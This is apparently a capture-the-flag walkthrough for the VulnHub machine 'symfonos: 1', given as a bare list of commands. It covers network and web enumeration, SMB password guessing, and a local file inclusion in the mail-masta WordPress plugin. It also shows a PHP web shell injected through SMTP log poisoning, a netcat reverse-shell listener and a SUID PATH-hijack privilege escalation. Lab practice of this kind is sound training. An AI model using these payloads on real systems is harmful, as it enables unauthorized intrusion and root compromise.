VulnHub: symfonos: 1

nmap -sn 192.168.60.128/24
nmap -Pn 192.168.60.131nmap -Pn -p1000- 192.168.60.131
nmap -A -p22,25,80,139,445 192.168.60.131
nmap --script -p22,25,80,139,445 192.168.60.131
ssh 192.168.60.131
telnet 192.168.131.60 25
nikto -h http://192.168.131.60
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.60.131/ -x php,txt,html,sh,cgi,bak -qgobuster dir --wordlist /usr/share/dirb/wordlists/big.txt -u http://192.168.60.131/ -x php,txt,html,sh,cgi,bak -qgobuster dir --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.60.131/ -x php,txt,html,sh,cgi,bak -q
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 192.168.60.131
smbclient //192.168.60.131/anonymousdir
get attention.txtexitcat attention.txt
smbclient //192.168.60.131/helios -U heliospassword: epidoko -> failedpassword: qwerty -> succeededdir
get research.txtget todo.txtexit
cat research.txtcat todo.txt
nano /etc/hosts
nikto -h http://symfonos.local/h3l105/
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://symfonos.local/h3l105/ -x php,txt,html,sh,cgi,bak -qgobuster dir --wordlist /usr/share/dirb/wordlists/big.txt -u http://symfonos.local/h3l105/ -x php,txt,html,sh,cgi,bak -qgobuster dir --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://symfonos.local/h3l105/ -x php,txt,html,sh,cgi,bak -q
wpscan --url http://symfonos.local/h3l105/ -et -ep -eu
wpscan --url http://symfonos.local/h3l105/ --plugins-detection aggressive
wpscan --url http://symfonos.local/h3l105/ -et -ep -eu -P pass_from_smb.txt
wpscan --url http://symfonos.local/h3l105/ -et -ep -eu -P /usr/share/wordlist/rockyou.txt
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/log/mail.log
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios
telnet 192.168.60.131 25EHLO jckhmr
MAIL FROM: "jckhmr <?php echo shell_exec($_GET['cmd']);?>"

RCPT TO: helios

DATA

.

quit
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=id
rlwrap nc -lvp 443
python -c 'import pty;pty.spawn("/bin/bash");'
cd /optls -la
./statuscheck
find / -perm -u=s -type f 2>/dev/null
strings /opt/statuscheck
cd /tmpecho /bin/sh > curlchmod 777 curlexport PATH=/tmp:$PATH/opt/statuscheckwhoami
cd /rootls -lacat proof.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store